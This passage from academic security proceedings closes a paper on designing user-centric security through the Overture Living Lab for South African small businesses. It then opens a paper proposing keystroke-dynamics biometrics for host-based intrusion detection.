advance beyond the current state of affairs <strong>in</strong> usable and user-centred security systems, this paper<br />
proposes a LL approach aimed at br<strong>in</strong>g<strong>in</strong>g <strong>in</strong> the “lived experience”.<br />
And accord<strong>in</strong>g to the authors, there is still no work that has tried to take a “lived experience” to solve the<br />
issue beyond usable and user-centred security us<strong>in</strong>g a LL approach. This is the po<strong>in</strong>t of departure for this<br />
paper. Below we discuss how to use a LL approach to create user-centric security systems based on the<br />
Overture LL project.<br />
4. Achiev<strong>in</strong>g a user-centric <strong>in</strong>formation security system based on the Overture<br />
LL<br />
This section beg<strong>in</strong>s with a brief description of the Overture LL. It goes on to discuss how the Overture LL<br />
helped achieve user-centric security. The concepts of “secure by default” and “ground up” security are<br />
discussed.<br />
4.1 Overture LL<br />
Overture LL, was <strong>in</strong>itiated as part of Overture project for SAP Research Pretoria with the mandate “... to<br />
demonstrate socio-economic feasibility of a mobile bus<strong>in</strong>ess solution for the very small enterprises <strong>in</strong><br />
Emerg<strong>in</strong>g Economies”. Project Overture was established to provide a very small enterprise (VSE) <strong>in</strong> an<br />
emerg<strong>in</strong>g economy (EE), such as South Africa, with a solution to conduct its day-to-day bus<strong>in</strong>ess<br />
activities on a mobile phone. VSEs <strong>in</strong> this context are enterprises that consist of less than 20 employees<br />
and often do not adhere to or comply with regulatory mandates. VSEs lack f<strong>in</strong>ancial resources and ICT<br />
<strong>in</strong>frastructure. They exhibit high risk and uncerta<strong>in</strong>ty <strong>in</strong> terms of profit, growth and success.<br />
The Overture LL was therefore established to provide support to the iterative design and development of<br />
a “Mobile Bus<strong>in</strong>ess Services Platform” prototype for the VSEs. The prototype was tried and tested <strong>in</strong> a<br />
real-world environment with real end users chosen from the plumb<strong>in</strong>g <strong>in</strong>dustry as a selected vertical<br />
sector. The plumbers along with other stakeholders such as SAP Research Pretoria (a technology<br />
provider), CashBuild and PlumbL<strong>in</strong>k (plumb<strong>in</strong>g suppliers), Institute of Plumbers of South Africa,<br />
government agencies work<strong>in</strong>g with VSEs and a telco <strong>in</strong>termediary that hosts the prototype, have been<br />
actively <strong>in</strong>volved <strong>in</strong> the whole process from the beg<strong>in</strong>n<strong>in</strong>g of the project to the end provid<strong>in</strong>g a lived<br />
experience.<br />
The plumbers provided their direct or <strong>in</strong>direct <strong>in</strong>put (through feedback on their evaluation of the system as<br />
they <strong>in</strong>teract with it on a day-to-day basis) at all stages of design and development of the prototype. Their<br />
<strong>in</strong>puts were quickly put to test and necessary alterations made; those that were not feasible were<br />
discarded with a clear explanation and the feasible ones were <strong>in</strong>corporated <strong>in</strong> the next iteration. For<br />
example, at the beg<strong>in</strong>n<strong>in</strong>g of the exercise, all the users of the system were classified as end users. But as<br />
the plumbers, project managers, f<strong>in</strong>ancial controllers and adm<strong>in</strong>istrators began to work with the system, a<br />
concern was raised about the pr<strong>in</strong>ciples of “separation of duties”, “need to know” and the classification of<br />
<strong>in</strong>formation, which was then implemented <strong>in</strong> the next version. This gave our end users a strong sense of<br />
belong<strong>in</strong>g and ownership – a key success factor for acceptance and adoption of the f<strong>in</strong>al solution.<br />
Moreover, this provided both parties with a guarantee that the f<strong>in</strong>al product will address the exact needs<br />
76
Moses Dlam<strong>in</strong>i et al.<br />
of the target niche market and the end users will be happy about the product that they help build – a w<strong>in</strong>w<strong>in</strong><br />
situation <strong>in</strong>deed.<br />
4.2 Operations of the Overture LL<br />
The diagram below shows how the Overture LL approach <strong>in</strong>corporated the end user requirements, <strong>in</strong>puts<br />
and context through each step of the security development lifecycle (SDL) (Lipner & Howard, 2005).<br />
Figure 1: A Liv<strong>in</strong>g Lab based user-centric <strong>in</strong>formation security design process<br />
The design process started with all stakeholders draft<strong>in</strong>g the mandate and clear scope of the project. This<br />
was followed by the requirements analysis process which <strong>in</strong>cluded a threat analysis, risk analysis,<br />
usability requirements and vulnerability analysis. The threat analysis was conducted to get a<br />
comprehensive view of the potential threats of the proposed system. The vulnerability analysis, which<br />
was conducted after the first iteration, exam<strong>in</strong>ed the potential security holes with<strong>in</strong> the system. The risk<br />
analysis built on the threat and vulnerability analysis by identify<strong>in</strong>g the risk associated with the threats<br />
and vulnerabilities. The usability requirements were developed by our usability experts to provide the<br />
system with ease-of-use to help remove the complexity that is normally associated with <strong>in</strong>formation<br />
security systems.<br />
From this process, the system requirements as well as end user requirements were documented to<br />
provide <strong>in</strong>puts to the specification document. We then developed a conceptual model on a whiteboard<br />
and this was put <strong>in</strong>to design and then later sent to the development team. This system was developed<br />
and tested by the end users. The end users feedback helped us to ref<strong>in</strong>e our scope and mandate on the<br />
second iteration and all the identified vulnerabilities were patched and the system went through the same<br />
processes and all the time be<strong>in</strong>g open for the end user’ <strong>in</strong>puts until everyone was happy with the f<strong>in</strong>al<br />
product.<br />
The Overture LL has really provided the end users with a platform to actively provide their direct or<br />
<strong>in</strong>direct <strong>in</strong>put <strong>in</strong>to the system, either through their requirements, <strong>in</strong>puts (<strong>in</strong> form of feedback and<br />
comments) and the context (<strong>in</strong> terms of the operat<strong>in</strong>g conditions and environment). It puts the end users<br />
at the centre of design and development. Tak<strong>in</strong>g this approach facilitates the implementation of a truly<br />
user-centric approach to security systems. Below are some of the concepts that were further<br />
implemented <strong>in</strong> the process of the system development.<br />
4.3 Secure by default<br />
A lesson learnt <strong>in</strong> the Overture LL was that even <strong>in</strong> a LL environment; end users still need to be sure that<br />
the system <strong>in</strong> design and development is secure, dependable and reliable. It is very important that all the<br />
necessary security measures are put <strong>in</strong> place more especially at the design, development and pilot<br />
77
Moses Dlam<strong>in</strong>i et al.<br />
phase. This is because it is at this phase that the end users get to have a hands-on experience with the<br />
systems. If their first impression is that the system is not secure enough, they would be easily<br />
discouraged from us<strong>in</strong>g the system. From the onset, we assured them and made them aware that the<br />
system is secure and it adequately protects their privacy and <strong>in</strong>formation assets.<br />
All systems, even those which are under development or at the pilot phase, should be made to be<br />
“secure by default” mean<strong>in</strong>g that their default security configuration sett<strong>in</strong>gs must be the most secure<br />
sett<strong>in</strong>gs possible (Miller 2004 and Lipner & Howard 2005). Quite often when system sett<strong>in</strong>gs are set to<br />
the most secure state, they work only for selected options that they are meant to work for and noth<strong>in</strong>g<br />
more than that. They run with the least necessary privileges and all else that is unnecessary is disabled<br />
or blocked. We carefully analyzed the roles and the day-to-day work of the end-users and based on that<br />
we determ<strong>in</strong>ed their least privileges.<br />
Of note also is that the “secure by default” approach must be taken with extra caution to avoid security<br />
h<strong>in</strong>der<strong>in</strong>g end users from execut<strong>in</strong>g their daily duties. In most cases, the most secure configuration<br />
sett<strong>in</strong>gs are not user friendly sett<strong>in</strong>gs. Most end users will have difficulties <strong>in</strong> work<strong>in</strong>g with them, which<br />
might cause them to circumvent the security systems that are meant to protect them from threats.<br />
Consider, for example, an end user suggest<strong>in</strong>g that all communications must be encrypted and anti-virus<br />
be <strong>in</strong>stalled on all the mobile phones. This would consume a lot of process<strong>in</strong>g power, which might cause<br />
the system to be slow and therefore delay the end users from execut<strong>in</strong>g their day-to-day duties. Even<br />
though this would have provided us with a highly secure system, it would have been overkill and hence, it<br />
was excluded.<br />
4.4 Ground up security<br />
In this paper, a “ground up” approach refers to the process of develop<strong>in</strong>g security systems start<strong>in</strong>g from<br />
the needs and requirements of the target end users on the ground (Ghosh, Howell & Whittaker 2002;<br />
Vacca 2010:17). Only a “ground up approach” has the potential to help security system designers and<br />
developers to develop systems that are <strong>in</strong> l<strong>in</strong>e with what the end users need. Systems meant for the end<br />
users def<strong>in</strong>itely require end user <strong>in</strong>put and the end users must be treated as the major stakeholder.<br />
The target end users on the ground are required to cont<strong>in</strong>ue provid<strong>in</strong>g their <strong>in</strong>puts throughout the lifecycle<br />
of the development process <strong>in</strong> an iterative manner as reflected <strong>in</strong> figure 1. This means that, after the<br />
system has been developed, it goes to the end users for test<strong>in</strong>g and evaluation. The end users provide<br />
their feedback, which is taken as <strong>in</strong>put to the next iteration of the design and development cycle. The<br />
Overture LL environment provided the platform to ensure that all requirements, especially those from end<br />
users, were considered early enough to avoid technology misappropriation.<br />
5. Conclusion and future work<br />
A LL approach is one way of achiev<strong>in</strong>g user-centred security systems. However, it is worth not<strong>in</strong>g that a<br />
LL approach is not a silver bullet towards solv<strong>in</strong>g the issue of user-centric design and development of<br />
security systems, it is just one piece of the puzzle. With the emphasis on the end users, the limitation of<br />
this approach is that it is likely to dictate only the <strong>in</strong>clusion of features <strong>in</strong> response to the end user needs,<br />
which quite often are not even feasible to implement. Surely, a LL approach will put more focus on the<br />
end users, but know<strong>in</strong>g what the end users need and then provid<strong>in</strong>g them exactly that may not be good<br />
enough. This was one of the key lessons learnt. If we are to design technology game-changers with the<br />
potential to make a real socio-economic difference to society, it requires that we look beyond what the<br />
end users need, <strong>in</strong>to the th<strong>in</strong>gs that they are not even aware they need. This will require an <strong>in</strong>sightful<br />
understand<strong>in</strong>g and visibility of the end user needs, motivations, context, conditions, behaviour and<br />
environment. We need to understand the end users more than they do themselves <strong>in</strong> a similar manner to<br />
that of customer profil<strong>in</strong>g which determ<strong>in</strong>es the risk profile or creditworth<strong>in</strong>ess of potential customers <strong>in</strong><br />
<strong>in</strong>surance companies and f<strong>in</strong>ancial <strong>in</strong>stitutions, respectively. The Overture LL has provided us with just<br />
that.<br />
A comprehensive view to security system design and development will <strong>in</strong>clude requirements that are<br />
raised by the need to comply with <strong>in</strong>dustry standards and regulatory compliance mandates. Best<br />
practices, functional and non-functional requirements complete the other pieces of the puzzle. This is left<br />
as future work.<br />
78
Acknowledgement<br />
Moses Dlam<strong>in</strong>i et al.<br />
The support of SAP Research Pretoria/Meraka Unit of Technology Development/National Research<br />
Foundation towards this research is hereby acknowledged. Op<strong>in</strong>ions expressed and conclusions arrived<br />
at are solely those of the authors and should not necessarily be attributed to SAP Research/Meraka UTD/<br />
National Research Foundation. We would like to thank Rub<strong>in</strong>a Adam and Prof. Marlien Herselman for<br />
their <strong>in</strong>sightful comments and contribution to this paper.<br />
References<br />
Adams, A. and Sasse, M.A. (1999). Users are not the Enemy: Why Users Compromise Computer <strong>Security</strong><br />
Mechanisms and How to Take Remedial Measures, Communications of the ACM, Vol. 42, No. 12, December<br />
1999, pp. 40-46.<br />
Asher, C., Aumasson, J.-P. and Phan, R. C.-W. (2009), <strong>Security</strong> and privacy preserv<strong>in</strong>g <strong>in</strong> human-<strong>in</strong>volved networks,<br />
<strong>in</strong> the 50 th Proceed<strong>in</strong>gs of the iNetSec Conference, 23-24 April 2009, Zurich, Switzerland.<br />
Balfanz, D., Durfee, G., Smetters, D.K. and Gr<strong>in</strong>ter, R.E. (2004). In Search of Usable <strong>Security</strong>: Five Lessons from the<br />
Field, Journal of the IEEE <strong>Security</strong> and Privacy, IEEE Computer Society, September/October 2004, Vol. 2, No.<br />
5, pp. 19-24.<br />
Ben-Asher, N., Meyer, J., Möeller, S. and Englert, R. (2009). An Experimental System for Study<strong>in</strong>g the Tradeoff<br />
between Usability and <strong>Security</strong>, ares, pp.882-887, 2009 International Conference on Availability, Reliability and<br />
<strong>Security</strong>, 2009, Fukuoka, Japan.<br />
Ben-Asher, N., Meyer, J., Parmet, Y., Moeller, S. and Englert, R. (2010). An experimental microworld for evaluat<strong>in</strong>g<br />
the trade-off between usability and security, The 6 th Symposium On Usable privacy and <strong>Security</strong>, SOUPS 2010,<br />
14-16 July 2010, Redmond, WA.<br />
Braz, C., Seffah, A. and M’Raihi, D. (2007). Design<strong>in</strong>g a Trade-off between Usability and <strong>Security</strong>: A metrics based-<br />
Model, Human-Computer Interaction,INTERACT 2007, Lecture Nones <strong>in</strong> Computer Science, 2007, Vol. 4663,<br />
No. 2007, pp. 114-126.<br />
Dlam<strong>in</strong>i, M.T. (2010). The Economics of Information <strong>Security</strong>, MSc dissertation, University of Pretoria, available at:<br />
http://upetd.up.ac.za/thesis/available/etd-09202010-174918/, accessed 08 January 2011.<br />
Dlam<strong>in</strong>i, M.T., Eloff, J.H.P. and Eloff, M.M.(2009). Information <strong>Security</strong>: The Mov<strong>in</strong>g Target, Computers & <strong>Security</strong><br />
Journal, Elservier, Vol. 28, No.3-4, May-June 2009, pp. 189-198.<br />
Emil, J. (2010). <strong>Security</strong> – Functionality –Usability Trade-off, available onl<strong>in</strong>e at:<br />
http://emilonsecurity.wordpress.com/2010/10/17/security-functionality-usability-security-trade-off/, accessed 11<br />
January 2011.<br />
Faily, S. and Flechais, I. (2010), <strong>Security</strong> Through Usability: A user-centered approach for balanced security policy<br />
requirements, 2010 Annual Computer <strong>Security</strong> Applications Conference, ACSAC 2010, 6-10 December 2010,<br />
Texas, USA.<br />
Folstad, A. (2008). Liv<strong>in</strong>g Labs For Innovation and Development of Information and Communication Technology: A<br />
Literature Review, The Electronic Journal for Virtual Organizations and Networks, Vol. 10, Special Issue on<br />
Liv<strong>in</strong>g labs, August 2008, pp. 99-131.<br />
Ghosh, A.K., Howell, C. and Whittaker, J.A. (2002). Build<strong>in</strong>g Software Securely from the Ground Up, Journal of IEEE<br />
Software, IEEE Computer Society Press, Vol. 19, No. 1, January/February 2002, pp. 14-16.<br />
Holmstrom, U. (1999). User-centered design of security software, The 17 th International Symposium of Human<br />
Factors <strong>in</strong> Telecommunications, May 1999, Copenhagen, Denmark.<br />
Izadi, S., Hodges, S., Butler, A., West, D., Rrustemi, A. and Molloy, M. (2009). Th<strong>in</strong>Sight: a th<strong>in</strong> form-factor<br />
<strong>in</strong>teractive surfacetechnology, Communications of the ACM, Vol. 52, No. 12, December 2009, pp: 90-98.<br />
Jaferian, P., Botta, D., Hawkey, K. and Beznosov, K. (2009). A multi-method approach for user-centered design of<br />
identity management systems, The 5 th Symposium On Usable Privacy and <strong>Security</strong>, SOUPS 2009, 15-17July<br />
2009, Mounta<strong>in</strong> View, Canada.<br />
Lipner, S. and Howard, M. (2005). The Trustworthy Comput<strong>in</strong>g <strong>Security</strong> Development Lifecycle, White Paper,<br />
Microsoft Corporation, March 2005, available onl<strong>in</strong>e at: http://msdn.microsoft.com/en-us/library/ms995349.aspx,<br />
accessed 12 January 2011.<br />
Miller, J. (2004). Why “Secure By Default” is a step <strong>in</strong> the right direction, available onl<strong>in</strong>e at:<br />
http://www.securityfocus.com/columnists/241, accessed 12 January 2011.<br />
Miller, M.J. (2010). Cybersecurity 2010: Technology alone cannot solve this problem,<br />
Available onl<strong>in</strong>e at: http://blogs.globalcross<strong>in</strong>g.com/?q=content/cybersecurity-2010-technology-alone-cannot-solveproblem,<br />
accessed 08 January 2011.<br />
Nohlberg, M. and Bäckström, J . (2007) "User-centred security applied to the development of a management<br />
<strong>in</strong>formation system", Journal of Information Management & Computer <strong>Security</strong>, Vol. 15, No. 5, pp. 372 – 381.<br />
Patrick, A.S., Long, A.C. and Fl<strong>in</strong>n, S. (2003). HCI and <strong>Security</strong> Systems, HCI and <strong>Security</strong> Systems: A CHI 2003<br />
Workshop, CHI 2003, 5-10 April 2003, Florida, USA.<br />
Payne, B.D. and Edwards, W.K. (2008). A brief <strong>in</strong>troduction to Usable <strong>Security</strong>, IEEE Journal of Internet Comput<strong>in</strong>g,<br />
Vol.12, No. 3, May 2008, pp. 13-21.<br />
Rahaman, A. and Sasse, M.A. (2010). A framework for the lived experience of identity, IDIS 2010, Vol. 3, No. 3,<br />
December 2010, pp. 605-638.<br />
79
Moses Dlam<strong>in</strong>i et al.<br />
Santoro, R. and Conte, M (2009). Liv<strong>in</strong>g Labs <strong>in</strong> Open Innovation Functional regions, Whitepaper, available onl<strong>in</strong>e at:<br />
http://www.ami-communities.eu/pub/bscw.cgi/d441945/Liv<strong>in</strong>g%20Labs%20<strong>in</strong>%20Functional%20Regions%20-<br />
%20White%20Paper.pdf, accessed 20 December 2010.<br />
Sasse, A.M., Brostoff, S. and Weirich, D. (2001). Transform<strong>in</strong>g the Weakest L<strong>in</strong>k – a Human/Computer Interaction<br />
Approach to Usable and Effective <strong>Security</strong>, BT Technology Journal, Vol. 19, No. 3, 1 July 2001, pp. 122-131.<br />
Schaffers, H., Merz, C., Guzman, J.G. and Navarro, M. (2009). Liv<strong>in</strong>g Labs and Rural Development Overview of the<br />
C@R Project, The Electronic Journal for Virtual Organizations and Networks, eJOV, Vol. 11, 2009, pp. 1-8.<br />
Schneier, B. (2000). Secrets and Lies: Digital security <strong>in</strong> a networked world, John Wiley and Sons, Inc, USA.<br />
Schumacher, J. (2008). Liv<strong>in</strong>g Labs <strong>in</strong> Future ICT Research, Presentation Slides, Swiss ICT Summit, 10 October<br />
2008, Lugano, Swirtzerland, available onl<strong>in</strong>e at: http://www.ictsummit.eu/template/fs/documents/10_LL-<br />
Schumacher.pdf, accessed 08 December 2010.<br />
S<strong>in</strong>ha, A. and Sprague, S. (2008). Bus<strong>in</strong>ess Beyond Boundaries: Ga<strong>in</strong><strong>in</strong>g Competitive Advantage <strong>in</strong> a Global<br />
Economy, A Jo<strong>in</strong>t SAP and Crossgate WhitePaper, available onl<strong>in</strong>e at:<br />
http://www.edispecialists.com/newsletter/SAP_and_Crossgate_Bus<strong>in</strong>ess%20Network%20Transformation.pdf,<br />
accessed 08 December 2010.<br />
Smith, S.W. (2003). Humans <strong>in</strong> the Loop: Human-Computer Interaction and <strong>Security</strong>, IEEE <strong>Security</strong> & Privacy<br />
Journal, IEEE Computer Society, Vol. 1, No. 3, May 2003, pp. 75-79.<br />
Vacca, J.A. (2010). Manag<strong>in</strong>g Information <strong>Security</strong>, Elservier 2010, USA.<br />
Van der Walt, J.S., Buitendag, A.A.K., Zaaiman, J.J. and van Vuuren, J.C.J. (2009). Community Liv<strong>in</strong>g Lab as a<br />
Collaborative Innovation Environment, Journal of Information Science and Information Technology, Vol. 6, No.<br />
2009, pp. 421-436.<br />
Vidyaraman, S. (2008). Gust: Game Theoric user-centered security design technique, PhD Thesis, State University<br />
of New York, USA.<br />
Zurko, M. E. (2005). User-centered <strong>Security</strong>: Stepp<strong>in</strong>g Up to the Grand Challenge, Proceed<strong>in</strong>gs of the 21 st Annual<br />
Computer <strong>Security</strong> Applications Conference, ACSAC 2005, IEEE Computer Society, 5-9 December 2005,<br />
Tucson, Arizona.<br />
Zurko, M.E. and Simon, R.T. (1997). User-centered <strong>Security</strong>, Proceed<strong>in</strong>gs of the 1996 New <strong>Security</strong> paradigms<br />
Workshop, CA.<br />
80
Intrusion Detection Through Keystroke Dynamics<br />
João Ferreira 1, 2 , Henrique Santos 1 and Bernardo Patrão 2<br />
1<br />
University of M<strong>in</strong>ho, Braga, Portugal<br />
2<br />
Critical Software S.A., Coimbra, Portugal<br />
jpedrossferreira@gmail.com<br />
hsantos@dsi.um<strong>in</strong>ho.pt<br />
bnf-patrao@criticalsoftware.com<br />
Abstract: With the ever-<strong>in</strong>creas<strong>in</strong>g number of <strong>in</strong>ternal attacks towards <strong>in</strong>formation systems, Intrusion Detection<br />
Systems (IDSs) have become a necessary addition to the security policy of nearly every organization. An IDS is<br />
responsible for monitor<strong>in</strong>g the events occurr<strong>in</strong>g <strong>in</strong> a computer system or network and analyz<strong>in</strong>g them for signs of<br />
possible violation of security policies. At the Host level, current IDSs (Host-Based IDSs) typically perform file <strong>in</strong>tegrity<br />
check<strong>in</strong>g, key file system objects monitor<strong>in</strong>g, log analysis, among other functions capable of reveal<strong>in</strong>g malicious<br />
alterations of the system state. A major drawback of this approach is its natural limitation to detect “legal” operations<br />
when performed by an <strong>in</strong>truder after gett<strong>in</strong>g access through legitimate credentials, possibly caus<strong>in</strong>g considerable<br />
damage. Currently, authentication mechanisms are the only barrier to prevent these attacks. The most common<br />
means of authentication <strong>in</strong>cludes passwords, often used <strong>in</strong> conjunction with tokens or biometric read<strong>in</strong>gs, for<br />
<strong>in</strong>creased security. However, these mechanisms do not offer cont<strong>in</strong>uous verification like IDSs do. One promis<strong>in</strong>g<br />
solution for this issue is to extend the IDS concept to the user authentication level, us<strong>in</strong>g Anomaly-based detection to<br />
dist<strong>in</strong>guish benign activity from malicious activity. Apply<strong>in</strong>g this concept with focus on the user requires track<strong>in</strong>g user<br />
profiles, lead<strong>in</strong>g us to biometric features. Keystroke Dynamics is a behavioral biometric technique that satisfies this<br />
goal. Besides be<strong>in</strong>g non-<strong>in</strong>trusive and <strong>in</strong>expensive, keystroke analysis is also very attractive because typ<strong>in</strong>g patterns<br />
are cont<strong>in</strong>uously available after the authentication phase. The development of such IDS is the ma<strong>in</strong> motivation for the<br />
work described <strong>in</strong> this paper. In order to preserve the attractiveness of this technology, the solution will face a set of<br />
challenges. It should be transparent to the user, and therefore the execution (gather<strong>in</strong>g typ<strong>in</strong>g rhythms, build<strong>in</strong>g user<br />
samples, comput<strong>in</strong>g comparison scores, and ref<strong>in</strong><strong>in</strong>g the stored profile through learn<strong>in</strong>g) will need to be performed<br />
without impos<strong>in</strong>g restrictions to user <strong>in</strong>put and without visual <strong>in</strong>terface. It must also be generic concern<strong>in</strong>g the<br />
keyboard type. Other important challenges come from the need to deal with unrestra<strong>in</strong>ed text <strong>in</strong>put. Lastly, the<br />
security of captured data and the possibility of allow<strong>in</strong>g future prevention measures by offer<strong>in</strong>g asynchronous<br />
detection capabilities are also considered.<br />
Keywords: keystroke dynamics, biometrics, host-based <strong>in</strong>trusion detection, authentication, security, anomaly-based<br />
detection<br />
1. Introduction<br />
Critical <strong>in</strong>formation is be<strong>in</strong>g progressively handled <strong>in</strong> digital format, a consequence of the reign<strong>in</strong>g<br />
Information Era. Proportionately, as the value of digital <strong>in</strong>formation escalates, cyber-attacks become<br />
<strong>in</strong>creas<strong>in</strong>gly threaten<strong>in</strong>g, and popular. Protect<strong>in</strong>g that <strong>in</strong>formation is therefore a grow<strong>in</strong>g necessity.<br />
Among several security technologies that emerged, User Authentication (with<strong>in</strong> the context of Access<br />
Control Policies) plays a very important role as a first control concern<strong>in</strong>g user/mach<strong>in</strong>e <strong>in</strong>teraction.<br />
Password-based authentication mechanisms are currently the most common way to assure the user is<br />
who he/she is supposed to be.<br />
To the trusted user, authentication mechanisms offer a reasonable layer of protection aga<strong>in</strong>st <strong>in</strong>truders.<br />
However, after the authentication phase is passed, the user is successfully identified and no further proof<br />
of identity is usually required. This lack of cont<strong>in</strong>uous identity verification is a severe access control<br />
vulnerability that allows for opportunist attacks, especially from <strong>in</strong>siders. Insiders are unavoidable,<br />
trusted, have access and opportunity. Studies show that 60 to 70 percent of cyber-attacks come from<br />
<strong>in</strong>siders (Lynch, 2006), and several are ignored by these statistics, s<strong>in</strong>ce a significant number of <strong>in</strong>sider<br />
attacks explore some sort of password abuse and are not detected (Schultz, 2002).<br />
For example, whenever a user leaves its workstation <strong>in</strong> a logged <strong>in</strong> state, an attacker nearby can use it to<br />
access critical <strong>in</strong>formation; <strong>in</strong> another ord<strong>in</strong>ary scenario, an <strong>in</strong>truder can persuade a legitimate user to let<br />
him use his computer to just read the mail or do other apparently <strong>in</strong>nocent task, and, maliciously, do<br />
someth<strong>in</strong>g else. Mitigat<strong>in</strong>g this threat with more frequent authentication challenges is not a valid option,<br />
s<strong>in</strong>ce it would be <strong>in</strong>convenient to the user, which could ultimately look for workarounds that would pose<br />
even greater security risks. Therefore, a better solution is the adoption of a technique that passively and<br />
cont<strong>in</strong>uously monitors the user’s <strong>in</strong>teractions, search<strong>in</strong>g for some proof of <strong>in</strong>trusion.<br />
81
João Ferreira et al.<br />
Host-based Intrusion Detection Systems (HIDSs) satisfy most of these conditions. However, current IDSs<br />
are focused on the system (<strong>in</strong>stead of the user). As a consequence, system-safe actions are considered<br />
legal (no matter who is really beh<strong>in</strong>d those actions), and it is still possible (<strong>in</strong> fact, very easy) for an<br />
attacker to execute malicious actions even with such a security control <strong>in</strong> place.<br />
To better address that issue, we propose a solution based on keystroke dynamics biometrics, adequately<br />
adapted to the <strong>in</strong>trusion detection operation. In this paper we describe the architecture of the solution and<br />
the keystroke dynamics method implemented to passively and cont<strong>in</strong>uously authenticate the user. In<br />
section 2 biometric concepts are <strong>in</strong>troduced and justified as the correct option for user authentication,<br />
with<strong>in</strong> the context of a HIDS function. In section 3, the option on Keystroke Dynamics is expla<strong>in</strong>ed, as<br />
well as different approaches published <strong>in</strong> the literature, for similar applications. Section 4 conta<strong>in</strong>s a<br />
description of related work. In section 5 we describe the architecture of the proposed solution, giv<strong>in</strong>g<br />
details of its ma<strong>in</strong> modules, and expla<strong>in</strong><strong>in</strong>g how key concepts were addressed, dur<strong>in</strong>g the design phase.<br />
Section 6 describes the experimental environment of this solution, and we wrap up the paper with some<br />
conclud<strong>in</strong>g remarks on section 7.<br />
2. Biometrics<br />
Biometric technologies can be used for two ma<strong>in</strong> objectives: identification and authentication. In the<br />
former case, a biometric trait is used for match<strong>in</strong>g process<strong>in</strong>g aga<strong>in</strong>st the entire content of a previously<br />
captured biometric database – this can be a huge problem, especially for very large databases. In the<br />
latter case a biometric trait is used to verify if it matches with one previously stored and belong<strong>in</strong>g to the<br />
user enrolled with the system – the match<strong>in</strong>g process is simpler, but precision is a ma<strong>in</strong> concern to avoid<br />
false negatives (negative authentication of a legitimate user) and false positives (positive authentication<br />
of an impersonator).<br />
Before tak<strong>in</strong>g biometric technologies as a solution for the authentication problem it is useful to compare it<br />
with alternatives.<br />
Authentication mechanisms are typically divided <strong>in</strong>to three classes (Liu and Silverman, 2001):<br />
Based on someth<strong>in</strong>g the user knows (or knowledge based) – the most common means of<br />
authentication, <strong>in</strong>cludes passwords and personal identification numbers (PINs). These suffer from the<br />
possibility of be<strong>in</strong>g easily duplicated, even without the user’s consent. Complex passwords can be<br />
forgotten (and because of that they are often stored or written, <strong>in</strong>creas<strong>in</strong>g the risk of theft), while<br />
simple passwords may be easily guessed, cracked or offered to an ill-<strong>in</strong>tentioned con artist.<br />
Based on someth<strong>in</strong>g the user has (or possession based) – keys and authentication tokens. Usually<br />
used <strong>in</strong> conjunction with PINs or passwords, these help <strong>in</strong>creas<strong>in</strong>g security, but can be easily lost,<br />
borrowed or stolen.<br />
Based on someth<strong>in</strong>g the user is (or identity based) – the field of biometric security. While be<strong>in</strong>g<br />
currently the least commonly deployed mechanisms <strong>in</strong> computer systems, they are believed to<br />
represent an effective mean of authentication. More importantly, with the added bonus of better<br />
protection of the authentication data from duplication, loss or theft, s<strong>in</strong>ce the data source is the user<br />
<strong>in</strong> question. Concern<strong>in</strong>g user <strong>in</strong>trusion detection based on authentication, biometrics is the only<br />
technology that allows an effective l<strong>in</strong>k between users and respective credentials. So, it is on<br />
biometric analysis that this paper is focused.<br />
Biometric features are commonly divided <strong>in</strong>to two categories: physiological and behavioral features. The<br />
physiological features <strong>in</strong>clude face, ret<strong>in</strong>al or iris patterns, f<strong>in</strong>gerpr<strong>in</strong>ts, palm topology, hand geometry,<br />
wrist ve<strong>in</strong>s and thermal images. On the other hand, behavioral features <strong>in</strong>clude voicepr<strong>in</strong>ts, keystroke<br />
dynamics, handwritten signatures and gait (Bergadano, Gunetti and Picardi, 2002).<br />
Physiological features are currently the most successfully implemented, due to the high variability of<br />
behavioral features – which can greatly vary between consecutive sampl<strong>in</strong>gs, s<strong>in</strong>ce they are dependent<br />
of a human user’s performance. Another drawback of many biometric techniques is the requirement of<br />
specific equipment, such as scanners or special cameras, <strong>in</strong> order to sample the required characteristics.<br />
Most users are also wary of us<strong>in</strong>g <strong>in</strong>trusive equipment (such as ret<strong>in</strong>al scanners, for example).<br />
On the HIDS context, a biometric technique can only be used if the user’s analyzed trait can be<br />
cont<strong>in</strong>uously sampled – which is rare for this k<strong>in</strong>d of techniques. An attractive biometric technique would<br />
perform transparently and cont<strong>in</strong>uously without any additional equipment.<br />
82
3. Keystroke dynamics<br />
João Ferreira et al.<br />
Fortunately it has been demonstrated that dist<strong>in</strong>ctive neurophysiological factors <strong>in</strong>fluence the typ<strong>in</strong>g<br />
patterns of human users <strong>in</strong>teract<strong>in</strong>g with a keyboard (Marsters, 2009). Us<strong>in</strong>g the keyboard as a source of<br />
biometric <strong>in</strong>formation is especially appeal<strong>in</strong>g due to the ever-availability of typ<strong>in</strong>g rhythms, <strong>in</strong>dependent of<br />
an authentication phase be<strong>in</strong>g passed (or fooled).<br />
Concern<strong>in</strong>g the user’s typ<strong>in</strong>g dynamics, on a standard keyboard connected to a Personal Computer we<br />
can extract the amount of time each key is held down (called dwell time), and the elapsed time between<br />
the release of the first key and the depression of the second (called flight time) (Monrose and Rub<strong>in</strong>,<br />
2000). These atomic features are usually merged to form n-graphs, represent<strong>in</strong>g consecutive keystrokes<br />
(digraphs, trigraphs and fourgraphs be<strong>in</strong>g the most widely sampled graphs). Recent laptops feature 3-D<br />
accelerometer chips, and research on vibration-sensitive keystroke analysis has showed promis<strong>in</strong>g<br />
results (Lopatka and Peetz, 2009; Iwasaki, Miyaki and Rekimoto, 2009). However, this metric would not<br />
be usable on most situations (desktop computers; external keyboards; older laptops), harm<strong>in</strong>g the<br />
desired generality. The possibility of us<strong>in</strong>g distance between keys as a valid metric was also studied, to<br />
no avail (Magalhães, 2005).<br />
Apart from the natural unreliability of the human user as a data source, a factor <strong>in</strong>tr<strong>in</strong>sic to all behavioral<br />
biometric measur<strong>in</strong>g, an authentication system based solely on keystroke tim<strong>in</strong>g <strong>in</strong>formation is of course<br />
susceptible to other problems. A considerable number of potential sources of noise might shift the user’s<br />
behavior away from their normal typ<strong>in</strong>g profile. J.-D. Marsters (2009) listed some examples: weather<br />
conditions (a cold day might mean that a typist’s f<strong>in</strong>gers move more slowly), fatigue and stress, <strong>in</strong>jury,<br />
and even a simple distraction (common <strong>in</strong> an office environment). All these factors can add a significant<br />
amount of noise to an otherwise consistent typ<strong>in</strong>g.<br />
These variations will <strong>in</strong>evitably <strong>in</strong>duce false-positives and false-negatives on any behavioral biometric<br />
based system. Valid solutions us<strong>in</strong>g keystroke dynamics need to take them <strong>in</strong>to account, and try to<br />
